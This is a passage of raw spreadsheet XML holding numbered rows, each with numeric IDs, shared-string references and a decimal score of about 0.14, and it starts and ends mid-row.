      <c r="B5615" s="2">
        <v>4.7159762E7</v>
      </c>
      <c r="C5615" s="2" t="s">
        <v>5356</v>
      </c>
      <c r="D5615" s="2">
        <v>1.0</v>
      </c>
      <c r="E5615" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5615" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="5616" ht="15.75" customHeight="1">
      <c r="A5616" s="1">
        <v>32447.0</v>
      </c>
      <c r="B5616" s="2">
        <v>5.6702946E7</v>
      </c>
      <c r="C5616" s="2" t="s">
        <v>5357</v>
      </c>
      <c r="D5616" s="2">
        <v>1.0</v>
      </c>
      <c r="E5616" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5616" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="5617" ht="15.75" customHeight="1">
      <c r="A5617" s="1">
        <v>33302.0</v>
      </c>
      <c r="B5617" s="2">
        <v>7491061.0</v>
      </c>
      <c r="C5617" s="2" t="s">
        <v>5358</v>
      </c>
      <c r="D5617" s="2">
        <v>1.0</v>
      </c>
      <c r="E5617" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5617" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="5618" ht="15.75" customHeight="1">
      <c r="A5618" s="1">
        <v>20438.0</v>
      </c>
      <c r="B5618" s="2">
        <v>1.2384534E7</v>
      </c>
      <c r="C5618" s="2" t="s">
        <v>5359</v>
      </c>
      <c r="D5618" s="2">
        <v>1.0</v>
      </c>
      <c r="E5618" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5618" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="5619" ht="15.75" customHeight="1">
      <c r="A5619" s="1">
        <v>22210.0</v>
      </c>
      <c r="B5619" s="2">
        <v>3.2155677E7</v>
      </c>
      <c r="C5619" s="2" t="s">
        <v>5360</v>
      </c>
      <c r="D5619" s="2">
        <v>1.0</v>
      </c>
      <c r="E5619" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5619" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="5620" ht="15.75" customHeight="1">
      <c r="A5620" s="1">
        <v>33938.0</v>
      </c>
      <c r="B5620" s="2">
        <v>9288435.0</v>
      </c>
      <c r="C5620" s="2" t="s">
        <v>5361</v>
      </c>
      <c r="D5620" s="2">
        <v>1.0</v>
      </c>
      <c r="E5620" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5620" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="5621" ht="15.75" customHeight="1">
      <c r="A5621" s="1">
        <v>22704.0</v>
      </c>
      <c r="B5621" s="2">
        <v>4273628.0</v>
      </c>
      <c r="C5621" s="2" t="s">
        <v>5362</v>
      </c>
      <c r="D5621" s="2">
        <v>1.0</v>
      </c>
      <c r="E5621" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5621" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="5622" ht="15.75" customHeight="1">
      <c r="A5622" s="1">
        <v>25082.0</v>
      </c>
      <c r="B5622" s="2">
        <v>1.28818E7</v>
      </c>
      <c r="C5622" s="2" t="s">
        <v>5363</v>
      </c>
      <c r="D5622" s="2">
        <v>1.0</v>
      </c>
      <c r="E5622" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5622" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="5623" ht="15.75" customHeight="1">
      <c r="A5623" s="1">
        <v>26228.0</v>
      </c>
      <c r="B5623" s="2">
        <v>1.6279652E7</v>
      </c>
      <c r="C5623" s="2" t="s">
        <v>5364</v>
      </c>
      <c r="D5623" s="2">
        <v>1.0</v>
      </c>
      <c r="E5623" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5623" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="5624" ht="15.75" customHeight="1">
      <c r="A5624" s="1">
        <v>29553.0</v>
      </c>
      <c r="B5624" s="2">
        <v>3.3097615E7</v>
      </c>
      <c r="C5624" s="2" t="s">
        <v>5365</v>
      </c>
      <c r="D5624" s="2">
        <v>1.0</v>
      </c>
      <c r="E5624" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5624" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="5625" ht="15.75" customHeight="1">
      <c r="A5625" s="1">
        <v>32964.0</v>
      </c>
      <c r="B5625" s="2">
        <v>6519382.0</v>
      </c>
      <c r="C5625" s="2" t="s">
        <v>5366</v>
      </c>
      <c r="D5625" s="2">
        <v>1.0</v>
      </c>
      <c r="E5625" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5625" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="5626" ht="15.75" customHeight="1">
      <c r="A5626" s="1">
        <v>20273.0</v>
      </c>
      <c r="B5626" s="2">
        <v>1.1134056E7</v>
      </c>
      <c r="C5626" s="2" t="s">
        <v>5331</v>
      </c>
      <c r="D5626" s="2">
        <v>1.0</v>
      </c>
      <c r="E5626" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5626" s="2">
        <v>0.1431924882629108</v>
      </c>
    </row>
    <row r="5627" ht="15.75" customHeight="1">
      <c r="A5627" s="1">
        <v>21323.0</v>
      </c>
      <c r="B5627" s="2">
        <v>2.0956362E7</v>
      </c>
      <c r="C5627" s="2" t="s">
        <v>5367</v>
      </c>
      <c r="D5627" s="2">
        <v>1.0</v>
      </c>
      <c r="E5627" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5627" s="2">
        <v>0.1430041152263374</v>
      </c>
    </row>
    <row r="5628" ht="15.75" customHeight="1">
      <c r="A5628" s="1">
        <v>22558.0</v>
      </c>
      <c r="B5628" s="2">
        <v>3.8361514E7</v>
      </c>
      <c r="C5628" s="2" t="s">
        <v>5368</v>
      </c>
      <c r="D5628" s="2">
        <v>1.0</v>
      </c>
      <c r="E5628" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5628" s="2">
        <v>0.1429872495446266</v>
      </c>
    </row>
    <row r="5629" ht="15.75" customHeight="1">
      <c r="A5629" s="1">
        <v>27035.0</v>
      </c>
      <c r="B5629" s="2">
        <v>2.0143508E7</v>
      </c>
      <c r="C5629" s="2" t="s">
        <v>5369</v>
      </c>
      <c r="D5629" s="2">
        <v>1.0</v>
      </c>
      <c r="E5629" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5629" s="2">
        <v>0.1429872495446266</v>
      </c>
    </row>
    <row r="5630" ht="15.75" customHeight="1">
      <c r="A5630" s="1">
        <v>30895.0</v>
      </c>
      <c r="B5630" s="2">
        <v>4.6606505E7</v>
      </c>
      <c r="C5630" s="2" t="s">
        <v>5370</v>
      </c>
      <c r="D5630" s="2">
        <v>1.0</v>
      </c>
      <c r="E5630" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5630" s="2">
        <v>0.1427350427350428</v>
      </c>
    </row>
    <row r="5631" ht="15.75" customHeight="1">
      <c r="A5631" s="1">
        <v>32927.0</v>
      </c>
      <c r="B5631" s="2">
        <v>6427105.0</v>
      </c>
      <c r="C5631" s="2" t="s">
        <v>5371</v>
      </c>
      <c r="D5631" s="2">
        <v>1.0</v>
      </c>
      <c r="E5631" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5631" s="2">
        <v>0.1425438596491229</v>
      </c>
    </row>
    <row r="5632" ht="15.75" customHeight="1">
      <c r="A5632" s="1">
        <v>25297.0</v>
      </c>
      <c r="B5632" s="2">
        <v>1.3410648E7</v>
      </c>
      <c r="C5632" s="2" t="s">
        <v>5372</v>
      </c>
      <c r="D5632" s="2">
        <v>1.0</v>
      </c>
      <c r="E5632" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5632" s="2">
        <v>0.1425438596491228</v>
      </c>
    </row>
    <row r="5633" ht="15.75" customHeight="1">
      <c r="A5633" s="1">
        <v>31779.0</v>
      </c>
      <c r="B5633" s="2">
        <v>5221839.0</v>
      </c>
      <c r="C5633" s="2" t="s">
        <v>5373</v>
      </c>
      <c r="D5633" s="2">
        <v>1.0</v>
      </c>
      <c r="E5633" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5633" s="2">
        <v>0.14247311827957</v>
      </c>
    </row>
    <row r="5634" ht="15.75" customHeight="1">
      <c r="A5634" s="1">
        <v>31866.0</v>
      </c>
      <c r="B5634" s="2">
        <v>5285427.0</v>
      </c>
      <c r="C5634" s="2" t="s">
        <v>5373</v>
      </c>
      <c r="D5634" s="2">
        <v>1.0</v>
      </c>
      <c r="E5634" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5634" s="2">
        <v>0.14247311827957</v>
      </c>
    </row>
    <row r="5635" ht="15.75" customHeight="1">
      <c r="A5635" s="1">
        <v>31463.0</v>
      </c>
      <c r="B5635" s="2">
        <v>5.0419613E7</v>
      </c>
      <c r="C5635" s="2" t="s">
        <v>5374</v>
      </c>
      <c r="D5635" s="2">
        <v>1.0</v>
      </c>
      <c r="E5635" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5635" s="2">
        <v>0.1421957671957672</v>
      </c>
    </row>
    <row r="5636" ht="15.75" customHeight="1">
      <c r="A5636" s="1">
        <v>20308.0</v>
      </c>
      <c r="B5636" s="2">
        <v>1.1364204E7</v>
      </c>
      <c r="C5636" s="2" t="s">
        <v>5375</v>
      </c>
      <c r="D5636" s="2">
        <v>1.0</v>
      </c>
      <c r="E5636" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5636" s="2">
        <v>0.1421845574387948</v>
      </c>
    </row>
    <row r="5637" ht="15.75" customHeight="1">
      <c r="A5637" s="1">
        <v>29220.0</v>
      </c>
      <c r="B5637" s="2">
        <v>3.0822823E7</v>
      </c>
      <c r="C5637" s="2" t="s">
        <v>5376</v>
      </c>
      <c r="D5637" s="2">
        <v>1.0</v>
      </c>
      <c r="E5637" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5637" s="2">
        <v>0.1421845574387948</v>
      </c>
    </row>
    <row r="5638" ht="15.75" customHeight="1">
      <c r="A5638" s="1">
        <v>30862.0</v>
      </c>
      <c r="B5638" s="2">
        <v>4.6177438E7</v>
      </c>
      <c r="C5638" s="2" t="s">
        <v>5377</v>
      </c>
      <c r="D5638" s="2">
        <v>1.0</v>
      </c>
      <c r="E5638" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5638" s="2">
        <v>0.1421845574387948</v>
      </c>
    </row>
    <row r="5639" ht="15.75" customHeight="1">
      <c r="A5639" s="1">
        <v>22434.0</v>
      </c>
      <c r="B5639" s="2">
        <v>3.6207545E7</v>
      </c>
      <c r="C5639" s="2" t="s">
        <v>5378</v>
      </c>
      <c r="D5639" s="2">
        <v>1.0</v>
      </c>
      <c r="E5639" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5639" s="2">
        <v>0.1419753086419754</v>
      </c>
    </row>
    <row r="5640" ht="15.75" customHeight="1">
      <c r="A5640" s="1">
        <v>24257.0</v>
      </c>
      <c r="B5640" s="2">
        <v>1.0517565E7</v>
      </c>
      <c r="C5640" s="2" t="s">
        <v>5379</v>
      </c>
      <c r="D5640" s="2">
        <v>1.0</v>
      </c>
      <c r="E5640" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5640" s="2">
        <v>0.1419753086419754</v>
      </c>
    </row>
    <row r="5641" ht="15.75" customHeight="1">
      <c r="A5641" s="1">
        <v>27106.0</v>
      </c>
      <c r="B5641" s="2">
        <v>2.0611415E7</v>
      </c>
      <c r="C5641" s="2" t="s">
        <v>5380</v>
      </c>
      <c r="D5641" s="2">
        <v>1.0</v>
      </c>
      <c r="E5641" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5641" s="2">
        <v>0.1419753086419754</v>
      </c>
    </row>
    <row r="5642" ht="15.75" customHeight="1">
      <c r="A5642" s="1">
        <v>20675.0</v>
      </c>
      <c r="B5642" s="2">
        <v>1.4401731E7</v>
      </c>
      <c r="C5642" s="2" t="s">
        <v>5381</v>
      </c>
      <c r="D5642" s="2">
        <v>1.0</v>
      </c>
      <c r="E5642" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5642" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="5643" ht="15.75" customHeight="1">
      <c r="A5643" s="1">
        <v>25573.0</v>
      </c>
      <c r="B5643" s="2">
        <v>1.4332275E7</v>
      </c>
      <c r="C5643" s="2" t="s">
        <v>5342</v>
      </c>
      <c r="D5643" s="2">
        <v>1.0</v>
      </c>
      <c r="E5643" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5643" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="5644" ht="15.75" customHeight="1">
      <c r="A5644" s="1">
        <v>30889.0</v>
      </c>
      <c r="B5644" s="2">
        <v>4.6549172E7</v>
      </c>
      <c r="C5644" s="2" t="s">
        <v>5382</v>
      </c>
      <c r="D5644" s="2">
        <v>1.0</v>
      </c>
      <c r="E5644" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5644" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="5645" ht="15.75" customHeight="1">
      <c r="A5645" s="1">
        <v>13214.0</v>
      </c>
      <c r="B5645" s="2">
        <v>3.4164538E7</v>
      </c>
      <c r="C5645" s="2" t="s">
        <v>5383</v>
      </c>
      <c r="D5645" s="2">
        <v>1.0</v>
      </c>
      <c r="E5645" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5645" s="2">
        <v>0.1414930555555556</v>
      </c>
    </row>
    <row r="5646" ht="15.75" customHeight="1">
      <c r="A5646" s="1">
        <v>21353.0</v>
      </c>
      <c r="B5646" s="2">
        <v>2.1337499E7</v>
      </c>
      <c r="C5646" s="2" t="s">
        <v>5384</v>
      </c>
      <c r="D5646" s="2">
        <v>1.0</v>
      </c>
      <c r="E5646" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5646" s="2">
        <v>0.1414930555555556</v>
      </c>
    </row>
    <row r="5647" ht="15.75" customHeight="1">
      <c r="A5647" s="1">
        <v>22186.0</v>
      </c>
      <c r="B5647" s="2">
        <v>3.1743028E7</v>
      </c>
      <c r="C5647" s="2" t="s">
        <v>5385</v>
      </c>
      <c r="D5647" s="2">
        <v>1.0</v>
      </c>
      <c r="E5647" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5647" s="2">
        <v>0.1414930555555556</v>
      </c>
    </row>
    <row r="5648" ht="15.75" customHeight="1">
      <c r="A5648" s="1">
        <v>26082.0</v>
      </c>
      <c r="B5648" s="2">
        <v>1.5641933E7</v>
      </c>
      <c r="C5648" s="2" t="s">
        <v>5386</v>
      </c>
      <c r="D5648" s="2">
        <v>1.0</v>
      </c>
      <c r="E5648" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5648" s="2">
        <v>0.1414930555555556</v>
      </c>
    </row>
    <row r="5649" ht="15.75" customHeight="1">
      <c r="A5649" s="1">
        <v>26519.0</v>
      </c>
      <c r="B5649" s="2">
        <v>1.7643009E7</v>
      </c>
      <c r="C5649" s="2" t="s">
        <v>5387</v>
      </c>
      <c r="D5649" s="2">
        <v>1.0</v>
      </c>
      <c r="E5649" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5649" s="2">
        <v>0.1414930555555556</v>
      </c>
    </row>
    <row r="5650" ht="15.75" customHeight="1">
      <c r="A5650" s="1">
        <v>28675.0</v>
      </c>
      <c r="B5650" s="2">
        <v>2.7537903E7</v>
      </c>
      <c r="C5650" s="2" t="s">
        <v>5388</v>
      </c>
      <c r="D5650" s="2">
        <v>1.0</v>
      </c>
      <c r="E5650" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5650" s="2">
        <v>0.1414728682170543</v>
      </c>
    </row>
    <row r="5651" ht="15.75" customHeight="1">
      <c r="A5651" s="1">
        <v>12440.0</v>
      </c>
      <c r="B5651" s="2">
        <v>2.9266807E7</v>
      </c>
      <c r="C5651" s="2" t="s">
        <v>5389</v>
      </c>
      <c r="D5651" s="2">
        <v>1.0</v>
      </c>
      <c r="E5651" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5651" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="5652" ht="15.75" customHeight="1">
      <c r="A5652" s="1">
        <v>17940.0</v>
      </c>
      <c r="B5652" s="2">
        <v>5.1249805E7</v>
      </c>
      <c r="C5652" s="2" t="s">
        <v>5390</v>
      </c>
      <c r="D5652" s="2">
        <v>1.0</v>
      </c>
      <c r="E5652" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5652" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="5653" ht="15.75" customHeight="1">
      <c r="A5653" s="1">
        <v>20413.0</v>
      </c>
      <c r="B5653" s="2">
        <v>1.222813E7</v>
      </c>
      <c r="C5653" s="2" t="s">
        <v>5391</v>
      </c>
      <c r="D5653" s="2">
        <v>1.0</v>
      </c>
      <c r="E5653" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5653" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="5654" ht="15.75" customHeight="1">
      <c r="A5654" s="1">
        <v>20935.0</v>
      </c>
      <c r="B5654" s="2">
        <v>1.6449821E7</v>
      </c>
      <c r="C5654" s="2" t="s">
        <v>5392</v>
      </c>
      <c r="D5654" s="2">
        <v>1.0</v>
      </c>
      <c r="E5654" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5654" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="5655" ht="15.75" customHeight="1">
      <c r="A5655" s="1">
        <v>22383.0</v>
      </c>
      <c r="B5655" s="2">
        <v>3.5201698E7</v>
      </c>
      <c r="C5655" s="2" t="s">
        <v>5393</v>
      </c>
      <c r="D5655" s="2">
        <v>1.0</v>
      </c>
      <c r="E5655" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5655" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="5656" ht="15.75" customHeight="1">
      <c r="A5656" s="1">
        <v>24999.0</v>
      </c>
      <c r="B5656" s="2">
        <v>1.2690786E7</v>
      </c>
      <c r="C5656" s="2" t="s">
        <v>5394</v>
      </c>
      <c r="D5656" s="2">
        <v>1.0</v>
      </c>
      <c r="E5656" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5656" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="5657" ht="15.75" customHeight="1">
      <c r="A5657" s="1">
        <v>25920.0</v>
      </c>
      <c r="B5657" s="2">
        <v>1.5158857E7</v>
      </c>
      <c r="C5657" s="2" t="s">
        <v>5395</v>
      </c>
      <c r="D5657" s="2">
        <v>1.0</v>
      </c>
      <c r="E5657" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5657" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="5658" ht="15.75" customHeight="1">
      <c r="A5658" s="1">
        <v>26466.0</v>
      </c>
      <c r="B5658" s="2">
        <v>1.7366643E7</v>
      </c>
      <c r="C5658" s="2" t="s">
        <v>5396</v>
      </c>
      <c r="D5658" s="2">
        <v>1.0</v>
      </c>
      <c r="E5658" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5658" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="5659" ht="15.75" customHeight="1">
      <c r="A5659" s="1">
        <v>27110.0</v>
      </c>
      <c r="B5659" s="2">
        <v>2.0615421E7</v>
      </c>
      <c r="C5659" s="2" t="s">
        <v>5397</v>
      </c>
      <c r="D5659" s="2">
        <v>1.0</v>
      </c>
      <c r="E5659" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5659" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="5660" ht="15.75" customHeight="1">
      <c r="A5660" s="1">
        <v>31992.0</v>
      </c>
      <c r="B5660" s="2">
        <v>5.3297256E7</v>
      </c>
      <c r="C5660" s="2" t="s">
        <v>5398</v>
      </c>
      <c r="D5660" s="2">
        <v>1.0</v>
      </c>
      <c r="E5660" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5660" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="5661" ht="15.75" customHeight="1">
      <c r="A5661" s="1">
        <v>33319.0</v>
      </c>
      <c r="B5661" s="2">
        <v>7538284.0</v>
      </c>
      <c r="C5661" s="2" t="s">
        <v>5399</v>
      </c>
      <c r="D5661" s="2">
        <v>1.0</v>
      </c>
      <c r="E5661" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5661" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="5662" ht="15.75" customHeight="1">
      <c r="A5662" s="1">
        <v>19985.0</v>
      </c>
      <c r="B5662" s="2">
        <v>5.7622124E7</v>
      </c>
      <c r="C5662" s="2" t="s">
        <v>5400</v>
      </c>
      <c r="D5662" s="2">
        <v>1.0</v>
      </c>
      <c r="E5662" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5662" s="2">
        <v>0.1412037037037037</v>
      </c>
    </row>
    <row r="5663" ht="15.75" customHeight="1">
      <c r="A5663" s="1">
        <v>34114.0</v>
      </c>
      <c r="B5663" s="2">
        <v>9746803.0</v>
      </c>
      <c r="C5663" s="2" t="s">
        <v>5401</v>
      </c>
      <c r="D5663" s="2">
        <v>1.0</v>
      </c>
      <c r="E5663" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5663" s="2">
        <v>0.1411657559198543</v>
      </c>
    </row>
    <row r="5664" ht="15.75" customHeight="1">
      <c r="A5664" s="1">
        <v>32214.0</v>
      </c>
      <c r="B5664" s="2">
        <v>5.4866257E7</v>
      </c>
      <c r="C5664" s="2" t="s">
        <v>5402</v>
      </c>
      <c r="D5664" s="2">
        <v>1.0</v>
      </c>
      <c r="E5664" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5664" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="5665" ht="15.75" customHeight="1">
      <c r="A5665" s="1">
        <v>30106.0</v>
      </c>
      <c r="B5665" s="2">
        <v>3.6577622E7</v>
      </c>
      <c r="C5665" s="2" t="s">
        <v>5403</v>
      </c>
      <c r="D5665" s="2">
        <v>1.0</v>
      </c>
      <c r="E5665" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5665" s="2">
        <v>0.140901771336554</v>
      </c>
    </row>
    <row r="5666" ht="15.75" customHeight="1">
      <c r="A5666" s="1">
        <v>21408.0</v>
      </c>
      <c r="B5666" s="2">
        <v>2.1970446E7</v>
      </c>
      <c r="C5666" s="2" t="s">
        <v>5404</v>
      </c>
      <c r="D5666" s="2">
        <v>1.0</v>
      </c>
      <c r="E5666" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5666" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="5667" ht="15.75" customHeight="1">
      <c r="A5667" s="1">
        <v>23182.0</v>
      </c>
      <c r="B5667" s="2">
        <v>5221840.0</v>
      </c>
      <c r="C5667" s="2" t="s">
        <v>5405</v>
      </c>
      <c r="D5667" s="2">
        <v>1.0</v>
      </c>
      <c r="E5667" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5667" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="5668" ht="15.75" customHeight="1">
      <c r="A5668" s="1">
        <v>23423.0</v>
      </c>
      <c r="B5668" s="2">
        <v>5642057.0</v>
      </c>
      <c r="C5668" s="2" t="s">
        <v>5406</v>
      </c>
      <c r="D5668" s="2">
        <v>1.0</v>
      </c>
      <c r="E5668" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5668" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="5669" ht="15.75" customHeight="1">
      <c r="A5669" s="1">
        <v>25149.0</v>
      </c>
      <c r="B5669" s="2">
        <v>1.3055918E7</v>
      </c>
      <c r="C5669" s="2" t="s">
        <v>5407</v>
      </c>
      <c r="D5669" s="2">
        <v>1.0</v>
      </c>
      <c r="E5669" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5669" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="5670" ht="15.75" customHeight="1">
      <c r="A5670" s="1">
        <v>27581.0</v>
      </c>
      <c r="B5670" s="2">
        <v>2.2520941E7</v>
      </c>
      <c r="C5670" s="2" t="s">
        <v>5408</v>
      </c>
      <c r="D5670" s="2">
        <v>1.0</v>
      </c>
      <c r="E5670" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5670" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="5671" ht="15.75" customHeight="1">
      <c r="A5671" s="1">
        <v>27975.0</v>
      </c>
      <c r="B5671" s="2">
        <v>2.399587E7</v>
      </c>
      <c r="C5671" s="2" t="s">
        <v>5409</v>
      </c>
      <c r="D5671" s="2">
        <v>1.0</v>
      </c>
      <c r="E5671" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5671" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="5672" ht="15.75" customHeight="1">
      <c r="A5672" s="1">
        <v>28285.0</v>
      </c>
      <c r="B5672" s="2">
        <v>2.5523285E7</v>
      </c>
      <c r="C5672" s="2" t="s">
        <v>5410</v>
      </c>
      <c r="D5672" s="2">
        <v>1.0</v>
      </c>
      <c r="E5672" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5672" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="5673" ht="15.75" customHeight="1">
      <c r="A5673" s="1">
        <v>28606.0</v>
      </c>
      <c r="B5673" s="2">
        <v>2.7098393E7</v>
      </c>
      <c r="C5673" s="2" t="s">
        <v>5411</v>
      </c>
      <c r="D5673" s="2">
        <v>1.0</v>
      </c>
      <c r="E5673" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5673" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="5674" ht="15.75" customHeight="1">
      <c r="A5674" s="1">
        <v>29980.0</v>
      </c>
      <c r="B5674" s="2">
        <v>3610420.0</v>
      </c>
      <c r="C5674" s="2" t="s">
        <v>5412</v>
      </c>
      <c r="D5674" s="2">
        <v>1.0</v>
      </c>
      <c r="E5674" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5674" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="5675" ht="15.75" customHeight="1">
      <c r="A5675" s="1">
        <v>30465.0</v>
      </c>
      <c r="B5675" s="2">
        <v>3.9492736E7</v>
      </c>
      <c r="C5675" s="2" t="s">
        <v>5413</v>
      </c>
      <c r="D5675" s="2">
        <v>1.0</v>
      </c>
      <c r="E5675" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5675" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="5676" ht="15.75" customHeight="1">
      <c r="A5676" s="1">
        <v>31364.0</v>
      </c>
      <c r="B5676" s="2">
        <v>4.9902609E7</v>
      </c>
      <c r="C5676" s="2" t="s">
        <v>5414</v>
      </c>
      <c r="D5676" s="2">
        <v>1.0</v>
      </c>
      <c r="E5676" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5676" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="5677" ht="15.75" customHeight="1">
      <c r="A5677" s="1">
        <v>32155.0</v>
      </c>
      <c r="B5677" s="2">
        <v>5.4295328E7</v>
      </c>
      <c r="C5677" s="2" t="s">
        <v>5415</v>
      </c>
      <c r="D5677" s="2">
        <v>1.0</v>
      </c>
      <c r="E5677" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5677" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="5678" ht="15.75" customHeight="1">
      <c r="A5678" s="1">
        <v>32410.0</v>
      </c>
      <c r="B5678" s="2">
        <v>5638037.0</v>
      </c>
      <c r="C5678" s="2" t="s">
        <v>5416</v>
      </c>
      <c r="D5678" s="2">
        <v>1.0</v>
      </c>
      <c r="E5678" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5678" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="5679" ht="15.75" customHeight="1">
      <c r="A5679" s="1">
        <v>33203.0</v>
      </c>
      <c r="B5679" s="2">
        <v>7168104.0</v>
      </c>
      <c r="C5679" s="2" t="s">
        <v>5417</v>
      </c>
      <c r="D5679" s="2">
        <v>1.0</v>
      </c>
      <c r="E5679" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5679" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="5680" ht="15.75" customHeight="1">
      <c r="A5680" s="1">
        <v>23533.0</v>
      </c>
      <c r="B5680" s="2">
        <v>5925898.0</v>
      </c>
      <c r="C5680" s="2" t="s">
        <v>5418</v>
      </c>
      <c r="D5680" s="2">
        <v>1.0</v>
      </c>
      <c r="E5680" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5680" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="5681" ht="15.75" customHeight="1">
      <c r="A5681" s="1">
        <v>18826.0</v>
      </c>
      <c r="B5681" s="2">
        <v>5.3931081E7</v>
      </c>
      <c r="C5681" s="2" t="s">
        <v>5419</v>
      </c>
      <c r="D5681" s="2">
        <v>1.0</v>
      </c>
      <c r="E5681" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5681" s="2">
        <v>0.1406810035842295</v>
      </c>
    </row>
    <row r="5682" ht="15.75" customHeight="1">
      <c r="A5682" s="1">
        <v>30642.0</v>
      </c>
      <c r="B5682" s="2">
